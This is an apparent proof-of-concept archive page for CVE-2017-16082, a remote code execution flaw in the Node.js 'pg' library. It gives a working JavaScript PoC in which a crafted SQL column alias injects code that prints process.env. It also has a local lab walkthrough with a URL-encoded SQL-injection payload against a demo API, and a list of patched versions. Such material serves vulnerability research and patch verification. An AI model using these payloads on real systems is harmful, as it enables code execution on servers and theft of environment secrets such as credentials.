Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1359 CNY

100%

CVE-2017-16082 PoC — pg模块安全漏洞

Source
Associated Vulnerability
Title: pg模块安全漏洞 (CVE-2017-16082)
Description:A remote code execution vulnerability was found within the pg module when the remote database or query specifies a specially crafted column name. There are 2 likely scenarios in which one would likely be vulnerable. 1) Executing unsafe, user-supplied sql which contains a malicious column name. 2) Connecting to an untrusted database and executing a query which returns results where any of the column names are malicious.
Description
NodeJS + Postgres (Remote Code Execution) 🛰
Readme
## CVE-2017-16082

### Overview

Affected versions of  `pg`  contain a remote code execution vulnerability that occurs when the remote database or query specifies a crafted column name.

There are two specific scenarios in which it is likely for an application to be vulnerable:

1.  The application executes unsafe, user-supplied sql which contains malicious column names.
2.  The application connects to an untrusted database and executes a query returning results which contain a malicious column name.

## Proof of Concept

```
const { Client } = require('pg')
const client = new Client()
client.connect()

const sql = `SELECT 1 AS "\\'/*", 2 AS "\\'*/\n + console.log(process.env)] = null;\n//"`

client.query(sql, (err, res) => {
  client.end()
})
```

### Remediation

-   Version 2.x.x: Update to version 2.11.2 or later.
-   Version 3.x.x: Update to version 3.6.4 or later.
-   Version 4.x.x: Update to version 4.5.7 or later.
-   Version 5.x.x: Update to version 5.2.1 or later.
-   Version 6.x.x: Update to version 6.4.2 or later. ( Note that versions 6.1.6, 6.2.5, and 6.3.3 are also patched. )
-   Version 7.x.x: Update to version 7.1.2 or later. ( Note that version 7.0.2 is also patched. )

### Local test 💣

`git clone https://github.com/nulldreams/CVE-2017-16082.git`

`cd CVE-2017-16082`

`npm i && node server.js`

Send a request to `localhost:5000/api/v1/users?id=1`
Result
```json
[
    {
        "id": 1,
        "username": "wubba",
        "password": "123",
        "createdAt": "2018-11-27T09:19:54.000Z",
        "updatedAt": "2018-11-27T09:19:54.000Z"
    }
]
```
Now, send a request using a payload like this `1;SELECT 1 AS "\']=0;console.log(process.env)//"` and encode in [url encoder](https://meyerweb.com/eric/tools/dencoder/)

Final url: `localhost:5000/api/v1/users?id=1%3BSELECT%201%20AS%20%22%5C%27%5D%3D0%3Bconsole.log(process.env)%2F%2F%22`
```json
[
    {
        "id": 1,
        "username": "wubba",
        "password": "123",
        "createdAt": "2018-11-27T09:19:54.000Z",
        "updatedAt": "2018-11-27T09:19:54.000Z"
    },
    {
        "\\": 0
    }
]
```

Check the terminal server.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →